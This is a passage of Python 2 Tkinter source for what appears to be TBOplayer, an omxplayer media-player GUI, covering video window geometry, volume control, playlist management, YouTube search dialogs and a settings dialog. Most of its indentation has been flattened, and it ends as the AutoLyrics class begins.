self.vprogress_bar_window.bind("<B1-Motion>", self.vwindow_motion)
self.vprogress_bar_window.bind("<Double-Button-1>", self.toggle_full_screen)
self.vprogress_bar_window.bind("<Motion>", self.vwindow_show_and_hide)
self.vprogress_bar_window.bind("<Double-1>", self.restore_window)
# Resize widget, placed in the lower right corner over the progress bar, not ideal.
self.vprogress_grip = Sizegrip(self.vprogress_bar_window)
self.vprogress_grip.place(relx=1.0, rely=1.0, anchor="se")
self.vprogress_grip.bind("<ButtonPress-1>", self.vwindow_start_resize)
self.vprogress_grip.bind("<ButtonRelease-1>", self.vwindow_stop_resize)
self.vprogress_grip.bind("<B1-Motion>", self.vwindow_motion)
self.vprogress_bar_window.protocol ("WM_TAKE_FOCUS", self.focus_root)
self.vwindow_show_and_hide()
def vwindow_start_move(self, event):
if self.options.full_screen == 1: return
self.vprogress_bar_window.x = event.x
self.vprogress_bar_window.y = event.y
def vwindow_stop_move(self, event):
if self.options.full_screen == 1: return
self.vprogress_bar_window.x = None
self.vprogress_bar_window.y = None
self.save_video_window_coordinates()
def vwindow_motion(self, event):
if self.options.full_screen == 1:
return
try:
deltax = (event.x - self.vprogress_bar_window.x)/2
deltay = (event.y - self.vprogress_bar_window.y)/2
except (TypeError, AttributeError):
log.logException()
sys.exc_clear()
return
if not self.vprogress_bar_window.resizing:
x = self.vprogress_bar_window.winfo_x() + deltax
y = self.vprogress_bar_window.winfo_y() + deltay
self.vprogress_bar_window.geometry("+%s+%s" % (x, y))
else:
w = self.vprogress_bar_window.winfo_width() + deltax
h = self.vprogress_bar_window.winfo_height() + deltay
try:
self.vprogress_bar_window.geometry("%sx%s" % (w, h))
except Exception:
log.logException()
sys.exc_clear()
self.options.full_screen = 1
self.toggle_full_screen()
self.vwindow_show_and_hide()
def vwindow_start_resize(self,event):
if (not self.media_is_video() or
self.options.full_screen == 1 or
not self.vprogress_bar_window):
return
self.vprogress_bar_window.resizing = 1
def vwindow_stop_resize(self,event):
if (not self.media_is_video() or
self.options.full_screen == 1 or
not self.vprogress_bar_window):
return
self.vprogress_bar_window.resizing = 0
self.save_video_window_coordinates()
def vwindow_show_and_hide(self, *event):
self.vprogress_bar.lift(self.vprogress_bar_frame)
if not self.options.full_screen:
self.vprogress_grip.lift(self.vprogress_bar)
self.move_video(pbar=True)
if not hasattr(self, '_vwindow_show_and_hide_flag'):
self._vwindow_show_and_hide_flag = None
if self._vwindow_show_and_hide_flag is None:
self._vwindow_show_and_hide_flag = self.root.after(3000, self.vwindow_hide)
else:
# refresh timer
self.root.after_cancel(self._vwindow_show_and_hide_flag)
self._vwindow_show_and_hide_flag = self.root.after(3000, self.vwindow_hide)
def vwindow_hide(self):
if self.play_state == self._OMX_PLAYING:
self._vwindow_show_and_hide_flag = None
self.vprogress_bar.lower(self.vprogress_bar_frame)
self.vprogress_grip.lower(self.vprogress_bar_frame)
self.move_video(pbar=False)
def set_full_screen(self,*event):
if not self.dbus_connected: return
screenres = self.get_screen_res()
try:
self.omx.set_video_geometry(0, 0, screenres[0], screenres[1])
self.vprogress_grip.lower(self.vprogress_bar_frame)
except Exception as e:
self.monitor(' [!] set_full_screen failed')
self.monitor(e)
def toggle_full_screen(self,*event):
hasvbw = hasattr(self, 'vprogress_bar_window')
if (not self.dbus_connected
or self.options.forbid_windowed_mode
or not self.media_is_video()
or not hasvbw
or (hasvbw and not self.vprogress_bar_window)):
return
screenres = self.get_screen_res()
if self.options.full_screen == 1:
self.options.full_screen = 0
width, height = (480, 360)
vsize_m = self.RE_RESOLUTION.match(self.options.windowed_mode_resolution)
if vsize_m:
width, height = [int(i) for i in vsize_m.groups()]
coords = self.options.windowed_mode_coords
coords_m = self.RE_COORDS.match(coords)
if coords_m is None or int(coords_m.group(1))>screenres[0] or int(coords_m.group(2))>screenres[1]:
coords = "+200+200"
geometry = "%dx%d%s" % (width, height, coords)
self.vprogress_bar_window.geometry(geometry)
else:
self.options.full_screen = 1
self.save_video_window_coordinates()
geometry = "%dx%d+%d+%d" % ( screenres[0], screenres[1], 0, 0)
self.vprogress_bar_window.geometry(geometry)
self.set_full_screen()
self.vprogress_grip.lower(self.vprogress_bar_frame)
self.vwindow_show_and_hide()
self.focus_root()
def move_video(self,event=None, pbar=True):
if not self.dbus_connected:
return
if not self.options.full_screen:
w = self.vprogress_bar_window.winfo_width()
h = self.vprogress_bar_window.winfo_height()
x1 = self.vprogress_bar_window.winfo_x()
y1 = self.vprogress_bar_window.winfo_y()
else:
w, h= self.get_screen_res()
x1 = y1 = 0
x2 = w+x1
y2 = h+y1
if pbar:
y2 -= self.vprogress_bar.winfo_height()
try:
self.omx.set_video_geometry(x1, y1, x2, y2)
except Exception as e:
self.monitor(' [!] move_video failed')
self.monitor(e)
self.focus_root()
def destroy_vprogress_bar(self):
try:
if self.options.full_screen == 0:
self.save_video_window_coordinates()
self.vprogress_bar_window.destroy()
self.vprogress_bar_window = None
except Exception:
log.logException()
sys.exc_clear()
self.monitor("Failed trying to destroy video window: video window nonexistent.")
def get_screen_res(self):
return (screen_width(), screen_height())
def media_is_video(self):
return hasattr(self,"omx") and hasattr(self.omx, "video") and len(self.omx.video) > 0
def restore_window(self, *event):
self.root.update()
self.root.deiconify()
def focus_root(self, *event):
self.root.focus()
def save_video_window_coordinates(self):
x = self.vprogress_bar_window.winfo_x()
y = self.vprogress_bar_window.winfo_y()
h = self.vprogress_bar_window.winfo_height()
w = self.vprogress_bar_window.winfo_width()
self.options.windowed_mode_coords = ("+" if x>=0 else "-")+str(x)+("+" if y>=0 else "-")+str(y)
self.options.windowed_mode_resolution = "%dx%d" % (w, h)
self.monitor('Saving windowed geometry: "%s%s"' % (self.options.windowed_mode_resolution,self.options.windowed_mode_coords))
# ***************************************
# VOLUME BAR CALLBACKS
# ***************************************
def set_volume_bar(self, event):
# new volume ranges from 0 - 60
new_volume = (event.x * self.volume_max)/self.volume_bar.winfo_width()
self.set_volume_bar_step(new_volume)
self.set_volume()
def set_volume_bar_step(self, step):
if step > self.volume_max:
step = self.volume_max
elif step <= 0:
step = 0
if step > self.volume_critical_step:
self.style.configure("volumebar.Horizontal.TProgressbar", foreground='red', background='red')
elif step <= self.volume_critical_step and self.volume_var.get() > self.volume_critical_step:
self.style.configure("volumebar.Horizontal.TProgressbar", foreground='cornflower blue', background='cornflower blue')
self.volume_var.set(step)
def set_volume(self):
if not self.dbus_connected: return
try:
self.omx.volume(self.mB2vol(self.get_mB()))
except Exception:
log.logException()
sys.exc_clear()
return False
def get_mB(self):
return (self.volume_var.get() - self.volume_normal_step) * 100
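    # Unit-conversion sketch for the two helpers below (units are an assumption
    # inferred from get_mB(): volume steps map to millibels, 1 dB == 100 mB):
    #   vol2dB(v)  = 20 * log10(v)        linear factor -> decibels
    #   mB2vol(mB) = 10 ** (mB / 2000.0)  millibels -> linear factor
    # e.g. vol2dB(1.0) == 0.0 and mB2vol(-600) is roughly 0.5 (about half volume).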
def vol2dB(self, volume):
return (2000.0 * log10(volume)) / 100
def mB2vol(self, mB):
return pow(10, mB / 2000.0)
# ***************************************
# DISPLAY TRACKS
# ***************************************
def display_selected_track(self,index=None):
index = index if index != None else self.start_track_index
if self.playlist.track_is_selected():
self.track_titles_display.activate(index)
self.display_selected_track_title.set(self.playlist.selected_track()[PlayList.TITLE])
else:
self.display_selected_track_title.set("")
def blank_selected_track(self):
self.display_selected_track_title.set("")
def refresh_playlist_display(self):
self.track_titles_display.delete(0,self.track_titles_display.size())
for index in range(self.playlist.length()):
self.playlist.select(index)
self.track_titles_display.insert(END, self.playlist.selected_track()[PlayList.TITLE])
# ***************************************
# TRACKS AND PLAYLISTS CALLBACKS
# ***************************************
def is_file_supported(self, f):
return from_file(f, mime=True) in self._SUPPORTED_MIME_TYPES
def add_drag_drop(self, action, actions, type, win, X, Y, x, y, data):
data = self.dnd.tcl_list_to_python_list(data)
for item in data:
if item.startswith('http'):
self._add_url(item)
elif os.path.isfile(item):
if item.endswith('.csv'):
self._open_list(item)
else:
self._add_files([item,])
elif os.path.isdir(item):
self.ajoute(item, False)
def add_track(self, path=None):
"""
Opens a dialog box to open files,
then stores the tracks in the playlist.
"""
# get the filez
if path:
filez = path
elif self.options.initial_track_dir == '':
if self.options.last_track_dir != '':
filez = tkFileDialog.askopenfilenames(initialdir=self.options.last_track_dir,parent=self.root,title=_('Choose the file(s)'))
else:
filez = tkFileDialog.askopenfilenames(parent=self.root,title=_('Choose the file(s)'))
else:
filez = tkFileDialog.askopenfilenames(initialdir=self.options.initial_track_dir,parent=self.root,title=_('Choose the file(s)'))
filez = self.root.tk.splitlist(filez)
if filez:
self.options.last_track_dir = filez[0][:filez[0].rindex('/')]
else:
return
self._add_files(filez)
def _add_files(self, filez):
for f in filez:
if not os.path.isfile(f) or not self.is_file_supported(f):
continue
self.file = f
self.file_pieces = self.file.split("/")
self.playlist.append([self.file, self.file_pieces[-1],'',''])
self.track_titles_display.insert(END, self.file_pieces[-1])
# and set the selected track
if len(filez)>1:
index = self.playlist.length() - len(filez)
else:
index = self.playlist.length() - 1
self.playlist.select(index)
def get_dir(self):
if self.options.initial_track_dir:
d = tkFileDialog.askdirectory(initialdir=self.options.initial_track_dir,title=_("Choose a directory"))
elif self.options.last_track_dir:
d = tkFileDialog.askdirectory(initialdir=self.options.last_track_dir,title=_("Choose a directory"))
else:
d = tkFileDialog.askdirectory(title=_("Choose a directory"))
return d
def ajoute(self,dir,recursive):
for f in os.listdir(dir):
try:
n=os.path.join(dir,f)
if recursive and os.path.isdir(n):
self.ajoute(n,True)
if os.path.isfile(n) and self.is_file_supported(n):
self.filename.set(n)
self.file = self.filename.get()
self.file_pieces = self.file.split("/")
self.playlist.append([self.file, self.file_pieces[-1],'',''])
self.track_titles_display.insert(END, self.file_pieces[-1])
except Exception:
log.logException()
sys.exc_clear()
return
def add_dir(self):
dirname = self.get_dir()
if dirname:
self.options.last_track_dir = dirname
self.ajoute(dirname,False)
def add_dirs(self):
dirname = self.get_dir()
if dirname:
self.options.last_track_dir = dirname
self.ajoute(dirname,True)
def add_url(self, *event):
cb = ""
try:
cb = self.root.clipboard_get()
except: pass
d = EditTrackDialog(self.root,_("Add URL"),
_("Title"), "",
_("Location"), "" if cb == "" or not cb.startswith("http") else cb)
if d.result == None:
return
name = d.result[0]
url = d.result[1]
self._add_url(url, name)
def _add_url(self, url, name=''):
if not url:
return
if not name:
name = url
if self.ytdl.is_running(url): return
if self.options.download_media_url_upon == "add" and self.ytdl.whether_to_use_youtube_dl(url):
self.go_ytdl(url)
name = self.YTDL_WAIT_TAG + name
self.playlist.append([url, name, url])
self.track_titles_display.insert(END, name)
self.playlist.select(self.playlist.length()-1)
def youtube_search(self):
def add_url_from_search(link):
if self.ytdl.is_running(link): return
if "list=" in link:
self.go_ytdl(link,playlist=True)
self.display_selected_track_title.set(_("Wait. Loading playlist content..."))
return
result = [link,'','']
self.go_ytdl(link)
result[1] = self.YTDL_WAIT_TAG + result[0]
self.playlist.append(result)
self.track_titles_display.insert(END, result[1])
YoutubeSearchDialog(self.root, add_url_from_search)
def remove_track(self,*event):
if self.playlist.length()>0 and self.playlist.track_is_selected():
if self.playlist.selected_track()[1].startswith(self.YTDL_WAIT_TAG) and self.ytdl_state==self._YTDL_WORKING:
# tell ytdl_state_machine to stop
self.quit_ytdl_sent_signal = True
index= self.playlist.selected_track_index()
self.track_titles_display.delete(index,index)
self.playlist.remove(index)
self.blank_selected_track()
self.display_time.set("")
def edit_track(self):
if self.playlist.track_is_selected():
index= self.playlist.selected_track_index()
d = EditTrackDialog(self.root,_("Edit Track"),
_("Title"), self.playlist.selected_track_title,
_("Location"), self.playlist.selected_track_location)
do_ytdl = False
if d.result and d.result[1] != '':
if (self.options.download_media_url_upon == "add" and not self.playlist.selected_track()[1].startswith(self.YTDL_WAIT_TAG) and
self.ytdl.whether_to_use_youtube_dl(d.result[1])):
do_ytdl = True
d.result[0] = self.YTDL_WAIT_TAG + d.result[0]
d.result = (d.result[1],d.result[0])
self.playlist.replace(index, d.result)
self.playlist.select(index)
self.refresh_playlist_display()
if do_ytdl:
self.go_ytdl(d.result[0])
def select_track(self, event):
"""
user clicks on a track in the display list so try and select it
"""
# needs forgiving int for possible tkinter upgrade
if self.playlist.length()>0:
index = 0
if event:
sel = event.widget.curselection()
if sel:
index=int(sel[0]) if event else 0
self.playlist.select(index)
def select_and_play(self, event=None):
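# Double-click handler: if omxplayer is already closed, play the selected track
# immediately; otherwise stop the current track first and keep retrying via
# root.after() until the player has closed, temporarily unbinding <Double-1> so
# repeated clicks do not queue multiple plays.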
if not hasattr(self, 'select_and_play_pending'):
self.select_and_play_pending = False
if self.play_state == self._OMX_CLOSED:
self.select_and_play_pending = False
self.play_track()
self.track_titles_display.bind("<Double-1>", self.select_and_play)
elif not self.select_and_play_pending and self.playing_location != self.playlist.selected_track_location:
self.track_titles_display.unbind("<Double-1>")
self.select_and_play_pending = True
self.stop_track()
if self.select_and_play_pending:
self.root.after(700, self.select_and_play)
def select_next_track(self):
if self.playlist.length()>0:
if self.start_track_index == None and self.play_state == self._OMX_CLOSED:
index = self.start_track_index = self.playlist.selected_track_index()
elif self.start_track_index == self.playlist.length() - 1:
index = self.start_track_index = 0
else:
index = self.start_track_index = self.start_track_index + 1
self.playlist.select(index)
self.display_selected_track(index)
def random_next_track(self):
if self.playlist.length()>0:
index = self.start_track_index = randint(0,self.playlist.length()-1)
self.playlist.select(index)
self.display_selected_track(index)
def select_previous_track(self):
if self.playlist.length()>0:
if self.start_track_index == None:
index = self.start_track_index = self.playlist.selected_track_index()
elif self.start_track_index == 0:
index = self.start_track_index = self.playlist.length() - 1
else:
index = self.start_track_index = self.start_track_index - 1
self.playlist.select(index)
self.display_selected_track(index)
def remove_waiting_track(self, url):
tracks = self.playlist.waiting_tracks()
if tracks:
for track in tracks:
if track[1][0] == url:
self.track_titles_display.delete(track[0],track[0])
self.playlist.remove(track[0])
self.blank_selected_track()
# ***************************************
# PLAYLISTS
# ***************************************
def open_list_dialog(self):
"""
opens a saved playlist
playlists are stored as text files, each record being "path","title"
"""
if self.options.initial_playlist_dir=='':
self.filename.set(tkFileDialog.askopenfilename(defaultextension = ".csv",
filetypes = [('csv files', '.csv')],
multiple=False))
else:
self.filename.set(tkFileDialog.askopenfilename(initialdir=self.options.initial_playlist_dir,
defaultextension = ".csv",
filetypes = [('csv files', '.csv')],
multiple=False))
filename = self.filename.get()
if filename=="":
return
self._open_list(filename)
def _open_list(self, filename):
#self.options.last_playlist_dir = ''
ifile = open(filename, 'rb')
pl=csv.reader(ifile)
self.playlist.clear()
self.track_titles_display.delete(0,self.track_titles_display.size())
for pl_row in pl:
if len(pl_row) != 0:
if 'http' in pl_row[0]:
self._add_url(pl_row[0],pl_row[1])
continue
self.playlist.append([pl_row[0],pl_row[1],'',''])
self.track_titles_display.insert(END, pl_row[1])
ifile.close()
self.playlist.select(0)
return
def clear_list(self):
if tkMessageBox.askokcancel(_("Clear Playlist"),_("Clear Playlist")):
self.track_titles_display.delete(0,self.track_titles_display.size())
self.playlist.clear()
self.blank_selected_track()
self.display_time.set("")
def load_youtube_playlist(self):
d = LoadYtPlaylistDialog(self.root)
if not d.result or not "list=" in d.result:
return
else:
self.go_ytdl(d.result,playlist=True)
self.display_selected_track_title.set(_("Wait. Loading playlist content..."))
def save_list(self):
""" save a playlist """
self.filename.set(tkFileDialog.asksaveasfilename(
defaultextension = ".csv",
filetypes = [('csv files', '.csv')]))
filename = self.filename.get()
if filename=="":
return
ofile = open(filename, "wb")
for idx in range(self.playlist.length()):
self.playlist.select(idx)
item = self.playlist.selected_track()[PlayList.LOCATION]
ofile.write ('"' + (item if not 'http' in item else self.playlist.selected_track()[PlayList.LOCATION_BACKUP]) + '","' + self.playlist.selected_track()[PlayList.TITLE]+'"\n')
ofile.close()
return
def show_omx_track_info(self):
try:
tkMessageBox.showinfo(_("Track Information"), self.playlist.selected_track()[PlayList.LOCATION] +"\n\n"+
_("Video: ") + str(self.omx.video) + "\n" +
_("Audio: ") + str(self.omx.audio) + "\n" +
_("Time: ") + str(self.omx.timenf) + "\n" +
_("Misc: ") + str(self.omx.misc))
except: return
# *************************************
# OPTIONS DIALOG CLASS
# ************************************
class OptionsDialog(tkSimpleDialog.Dialog):
def __init__(self, parent, options_file, title=None, ):
# store subclass attributes
self.options_file=options_file
# init the super class
tkSimpleDialog.Dialog.__init__(self, parent, title)
def body(self, master):
config=ConfigParser.ConfigParser()
config.read(self.options_file)
self._config = config
self.geometry_var = config.get('config','geometry',0)
self.full_screen_var = config.get('config','full_screen',0)
self.windowed_mode_coords_var = config.get('config','windowed_mode_coords',0)
self.windowed_mode_resolution_var = config.get('config','windowed_mode_resolution',0)
self.autolyrics_coords_var = config.get('config','autolyrics_coords',0)
self.ltracks_var = config.get('config','ltracks',0)
Label(master, text=_("Audio Output:")).grid(row=0, sticky=W)
self.audio_var=StringVar()
self.audio_var.set(config.get('config','audio',0))
rb_hdmi=Radiobutton(master, text=_("HDMI"), variable=self.audio_var, value="hdmi")
rb_hdmi.grid(row=1,column=0,sticky=W)
rb_local=Radiobutton(master, text=_("Local"), variable=self.audio_var,value="local")
rb_local.grid(row=2,column=0,sticky=W)
rb_auto=Radiobutton(master, text=_("Both"), variable=self.audio_var,value="both")
rb_auto.grid(row=3,column=0,sticky=W)
rb_alsa=Radiobutton(master, text="ALSA", variable=self.audio_var,value="alsa")
rb_alsa.grid(row=4,column=0,sticky=W)
Label(master, text="").grid(row=9, sticky=W)
Label(master, text=_("Mode:")).grid(row=10, sticky=W)
self.mode_var=StringVar()
self.mode_var.set(config.get('config','mode',0))
rb_single=Radiobutton(master, text=_("Single"), variable=self.mode_var, value="single")
rb_single.grid(row=11,column=0,sticky=W)
rb_repeat=Radiobutton(master, text=_("Repeat"), variable=self.mode_var,value="repeat")
rb_repeat.grid(row=12,column=0,sticky=W)
rb_playlist=Radiobutton(master, text=_("Playlist"), variable=self.mode_var,value="playlist")
rb_playlist.grid(row=13,column=0,sticky=W)
rb_rplaylist=Radiobutton(master, text=_("Repeat playlist"), variable=self.mode_var,value="repeat playlist")
rb_rplaylist.grid(row=14,column=0,sticky=W)
rb_shuffle=Radiobutton(master, text=_("Shuffle"), variable=self.mode_var,value="shuffle")
rb_shuffle.grid(row=15,column=0,sticky=W)
Label(master, text="").grid(row=16, sticky=W)
Label(master, text=_("Download from Youtube:")).grid(row=17, sticky=W)
self.youtube_media_format_var=StringVar()
self.youtube_media_format_var.set(config.get('config','youtube_media_format',0))
rb_video=Radiobutton(master, text=_("Video and audio"), variable=self.youtube_media_format_var, value="mp4")
rb_video.grid(row=18,column=0,sticky=W)
rb_audio=Radiobutton(master, text=_("Audio only"), variable=self.youtube_media_format_var, value="m4a")
rb_audio.grid(row=19,column=0,sticky=W)
Label(master, text=_("Youtube media quality:")).grid(row=20, sticky=W)
self.youtube_video_quality_var=StringVar()
self.youtube_video_quality_var.set(config.get('config','youtube_video_quality',0))
om_quality = OptionMenu(master, self.youtube_video_quality_var, "high", "medium", "small")
om_quality.grid(row=21, sticky=W)
Label(master, text=_("Initial directory for tracks:")).grid(row=0, column=2, sticky=W)
self.e_tracks = Entry(master)
self.e_tracks.grid(row=1, column=2)
self.e_tracks.insert(0,config.get('config','tracks',0))
Label(master, text=_("Inital directory for playlists:")).grid(row=2, column=2, sticky=W)
self.e_playlists = Entry(master)
self.e_playlists.grid(row=3, column=2)
self.e_playlists.insert(0,config.get('config','playlists',0))
Label(master, text=_("OMXPlayer location:")).grid(row=10, column=2, sticky=W)
self.e_omx_location = Entry(master)
self.e_omx_location.grid(row=11, column=2)
self.e_omx_location.insert(0,config.get('config','omx_location',0))
Label(master, text=_("OMXPlayer options:")).grid(row=12, column=2, sticky=W)
self.e_omx_options = Entry(master)
self.e_omx_options.grid(row=13, column=2)
self.e_omx_options.insert(0,config.get('config','omx_options',0))
self.subtitles_var = StringVar()
self.cb_subtitles = Checkbutton(master,text=_("Subtitles"),variable=self.subtitles_var, onvalue="on",offvalue="off")
self.cb_subtitles.grid(row=14, column=2, sticky = W)
if config.get('config','subtitles',0)=="on":
self.cb_subtitles.select()
else:
self.cb_subtitles.deselect()
Label(master, text="").grid(row=16, column=2, sticky=W)
Label(master, text=_("youtube-dl location:")).grid(row=17, column=2, sticky=W)
self.e_ytdl_location = Entry(master)
self.e_ytdl_location.grid(row=18, column=2)
self.e_ytdl_location.insert(0,config.get('config','ytdl_location',0))
Label(master, text="").grid(row=19, column=2, sticky=W)
Label(master, text=_("Download actual media URL:")).grid(row=20, column=2, sticky=W)
self.download_media_url_upon_var=StringVar()
self.download_media_url_upon_var.set(_("when adding URL") if config.get('config','download_media_url_upon',0) == "add" else _("when playing URL"))
om_download_media = OptionMenu(master, self.download_media_url_upon_var, _("when adding URL"), _("when playing URL"))
om_download_media.grid(row=21, column=2, sticky=W)
Label(master, text="").grid(row=22, sticky=W)
Label(master, text=_("Interface language:")).grid(row=23, column=0, sticky=W)
self.lang_var=StringVar()
self.lang_var.set(config.get('config','lang',0))
om_lang = OptionMenu(master, self.lang_var,'en','es','fr','pt','pl','ro','ru')
om_lang.grid(row=24, column=0, sticky=W)
Label(master, text="").grid(row=22, sticky=W)
Label(master, text=_("Subtitles language:")).grid(row=23, column=2, sticky=W)
self.subtitles_lang_var=StringVar()
self.subtitles_lang_var.set(config.get('config','subtitles_lang',0))
om_lang = OptionMenu(master, self.subtitles_lang_var,'ar','ch','de','en','es','fr','it','ja','ko','pt','pl','ro','ru')
om_lang.grid(row=24, column=2, sticky=W)
self.forbid_windowed_mode_var = IntVar()
self.forbid_windowed_mode_var.set(int(config.get('config','forbid_windowed_mode',0)))
self.cb_forbid = Checkbutton(master,text=_("Forbid windowed mode"),variable=self.forbid_windowed_mode_var, onvalue=1,offvalue=0)
Label(master, text="").grid(row=51, sticky=W)
self.cb_forbid.grid(row=52, column=2, sticky = W)
if self.forbid_windowed_mode_var.get()==1:
self.cb_forbid.select()
else:
self.cb_forbid.deselect()
self.cue_track_mode_var = IntVar()
self.cue_track_mode_var.set(int(config.get('config','cue_track_mode',0)))
self.cb_cue = Checkbutton(master,text=_("Begin/End track paused"),variable=self.cue_track_mode_var, onvalue=1,offvalue=0)
Label(master, text="").grid(row=51, sticky=W)
self.cb_cue.grid(row=52, column=0, sticky = W)
if self.cue_track_mode_var.get()==1:
self.cb_cue.select()
else:
self.cb_cue.deselect()
self.autoplay_var = IntVar()
self.autoplay_var.set(int(config.get('config','autoplay',0)))
self.cb_autoplay = Checkbutton(master,text=_("Autoplay on start up"), variable=self.autoplay_var, onvalue=1,offvalue=0)
self.cb_autoplay.grid(row=60,columnspan=2, sticky = W)
if self.autoplay_var.get()==1:
self.cb_autoplay.select()
else:
self.cb_autoplay.deselect()
self.ytdl_update_var = IntVar()
self.ytdl_update_var.set(int(config.get('config','ytdl_update',0)))
self.cb_ytdl_update = Checkbutton(master, text=_("Keep youtube-dl up-to-date"), variable=self.ytdl_update_var, onvalue=1, offvalue=0)
self.cb_ytdl_update.grid(row=60,column=2, sticky = W)
if self.ytdl_update_var.get()==1:
self.cb_ytdl_update.select()
else:
self.cb_ytdl_update.deselect()
self.find_lyrics_var = IntVar()
self.cb_find_lyrics = Checkbutton(master,text=_("Find lyrics"),variable=self.find_lyrics_var, onvalue=1,offvalue=0)
self.cb_find_lyrics.grid(row=61,column=0, sticky = W)
if int(config.get('config','find_lyrics',0)) == 1:
self.cb_find_lyrics.select()
else:
self.cb_find_lyrics.deselect()
self.debug_var = StringVar()
self.cb_debug = Checkbutton(master,text=_("Debug"),variable=self.debug_var, onvalue='on',offvalue='off')
self.cb_debug.grid(row=61,column=2, sticky = W)
if config.get('config','debug',0)=='on':
self.cb_debug.select()
else:
self.cb_debug.deselect()
return None # no initial focus
def apply(self):
if self.debug_var.get() == 'on':
log.setLevel(logging.DEBUG)
else:
log.disableLogging()
self.save_options()
return True
def save_options(self):
""" save the output of the options edit dialog to file"""
config=self._config
if (self.lang_var.get() != config.get('config','lang',0)):
tkMessageBox.showinfo("",_("Restart TBOplayer to change language"))
config.set('config','audio',self.audio_var.get())
config.set('config','subtitles',self.subtitles_var.get())
config.set('config','mode',self.mode_var.get())
config.set('config','playlists',self.e_playlists.get())
config.set('config','tracks',self.e_tracks.get())
config.set('config','ltracks',self.ltracks_var)
config.set('config','omx_options',self.e_omx_options.get())
config.set('config','debug',self.debug_var.get())
config.set('config','youtube_media_format',self.youtube_media_format_var.get())
config.set('config','omx_location',self.e_omx_location.get())
config.set('config','ytdl_location',self.e_ytdl_location.get())
config.set('config','download_media_url_upon',"add" if self.download_media_url_upon_var.get() == _("when adding URL") else "play")
config.set('config','youtube_video_quality',self.youtube_video_quality_var.get())
config.set('config','geometry',self.geometry_var)
config.set('config','full_screen',self.full_screen_var)
config.set('config','windowed_mode_coords',self.windowed_mode_coords_var)
config.set('config','windowed_mode_resolution',self.windowed_mode_resolution_var)
config.set('config','forbid_windowed_mode',self.forbid_windowed_mode_var.get())
config.set('config','cue_track_mode',self.cue_track_mode_var.get())
config.set('config','autoplay',self.autoplay_var.get())
config.set('config','find_lyrics',self.find_lyrics_var.get())
config.set('config','autolyrics_coords',self.autolyrics_coords_var)
config.set('config','lang',self.lang_var.get())
config.set('config','subtitles_lang',self.subtitles_lang_var.get())
config.set('config','ytdl_update',self.ytdl_update_var.get())
with open(self.options_file, 'wb') as configfile:
    config.write(configfile)
# *************************************
# EDIT TRACK DIALOG CLASS
# ************************************
class EditTrackDialog(tkSimpleDialog.Dialog):
def __init__(self, parent, title=None, *args):
#save the extra args to instance variables
self.label_location=args[0]
self.default_location=args[1]
self.label_title=args[2]
self.default_title=args[3]
#and call the base class _init_which uses the args in body
tkSimpleDialog.Dialog.__init__(self, parent, title)
def body(self, master):
Label(master, text=self.label_location).grid(row=0)
Label(master, text=self.label_title).grid(row=1)
self.field1 = Entry(master)
self.field2 = Entry(master)
self.field1.grid(row=0, column=1)
self.field2.grid(row=1, column=1)
self.field1.insert(0,self.default_location)
self.field2.insert(0,self.default_title)
return self.field2 # initial focus on title
def apply(self):
first = self.field1.get()
second = self.field2.get()
self.result = [first, second,'','']
return self.result
# *************************************
# LOAD YOUTUBE PLAYLIST DIALOG
# ************************************
class LoadYtPlaylistDialog(tkSimpleDialog.Dialog):
def __init__(self, parent):
#save the extra args to instance variables
self.label_url="URL"
self.default_url=""
#and call the base class _init_which uses the args in body
tkSimpleDialog.Dialog.__init__(self, parent, _("Load Youtube playlist"))
def body(self, master):
Label(master, text=self.label_url).grid(row=0)
self.field1 = Entry(master)
self.field1.grid(row=0, column=1)
self.field1.insert(0,self.default_url)
return self.field1 # initial focus on title
def apply(self):
self.result = self.field1.get()
return self.result
from urllib import quote_plus
import requests
class YoutubeSearchDialog(Toplevel):
def __init__(self, parent, add_url_function):
# store subclass attributes
self.max_results = 20
self.result_cells = []
self.add_url = add_url_function
# init the super class
Toplevel.__init__(self, parent)
self.transient(parent)
self.title(_("Youtube search"))
self.geometry("390x322")
self.resizable(False,False)
master = self
self.field1 = Entry(master)
self.field1.grid(row=0, column=0)
self.field1.focus_set()
Button(master, width = 5, height = 1, text = _('Search!'),
foreground='black', command = self.search,
background='light grey').grid(row=0, column=1)
Button(master, width = 5, height = 1, text = _('Clear'),
foreground='black', command = self.clear_search,
background='light grey').grid(row=1, column=1)
self.page_lbl = _("Page: ")
self.page_var = tk.StringVar()
self.page_var.set(self.page_lbl)
Label(master, font=('Comic Sans', 9),
fg = 'black', wraplength = 100,
textvariable=self.page_var,
background="light grey").grid(row=0, column=2)
page_btn = Button(master, width = 5, height = 1, text = '1 | 2 | 3',
foreground='black',background='light grey')
page_btn.grid(row=1, column=2)
page_btn.bind("<ButtonRelease-1>", self.search_page)
self.frame = VerticalScrolledFrame(master)
self.frame.grid(row=2,column=0,columnspan=3,rowspan=6)
self.frame.configure_scrolling()
def search(self, page = 0):
fvalue = self.field1.get()
if fvalue == "": return
self.clear_search()
self.page_var.set(self.page_lbl + str(page + 1))
offset = self.max_results * page
try:
search = SearchVideos(fvalue.decode('latin1').encode('utf8'),
offset = offset,
mode = "json",
max_results = self.max_results)
result = json.loads(search.result())['search_result']
self.show_result(result)
except Exception as e:
print("Exception while doing youtube search: ",e)
def search_page(self, event):
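# The single '1 | 2 | 3' page button is divided into three click zones by the
# event's x coordinate: its left, middle and right thirds request result pages
# 0, 1 and 2 respectively.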
wwidth = event.widget.winfo_width()
if event.x < wwidth/3:
page = 0
elif event.x < 2*(wwidth/3):
page = 1
else:
page = 2
self.search(page)
def show_result(self, result):
for r in result:
if (r['link'] is not None and r['link'] != "" and
r['title'] is not None and r['title'] != ""):
yt_result_cell = YtresultCell(
self.frame.interior, self.add_url, r['link'], r['title']
)
self.result_cells.append(yt_result_cell)
return
def clear_search(self):
for r in self.result_cells:
r.destroy()
self.result_cells = []
self.frame.canvas.yview_moveto(0)
return
def apply(self):
return
class YtresultCell(Frame):
def __init__(self, parent, add_url_function, link, title):
Frame.__init__(self, parent)
self.grid(sticky=W)
self.video_name = tk.StringVar()
self.video_link = tk.StringVar()
self.video_link.set(link)
self.add_url = add_url_function
try:
self.video_name.set(title)
except: pass
self.create_widgets()
def create_widgets(self):
if "list=" in self.video_link.get():
self.video_name.set("(playlist) " + self.video_name.get())
Label(self, font=('Comic Sans', 10),
foreground='black', wraplength = 300, height = 2,
textvariable=self.video_name,
background="grey").grid(row = 0, column=0, columnspan=2, sticky=W)
Button(self, width = 5, height = 1, text=_('Add'),
foreground='black', command = self.add_link,
background="light grey").grid(row = 0, column=2, sticky=W)
def add_link(self,*event):
self.add_url(self.video_link.get())
class AutoLyrics(Toplevel):
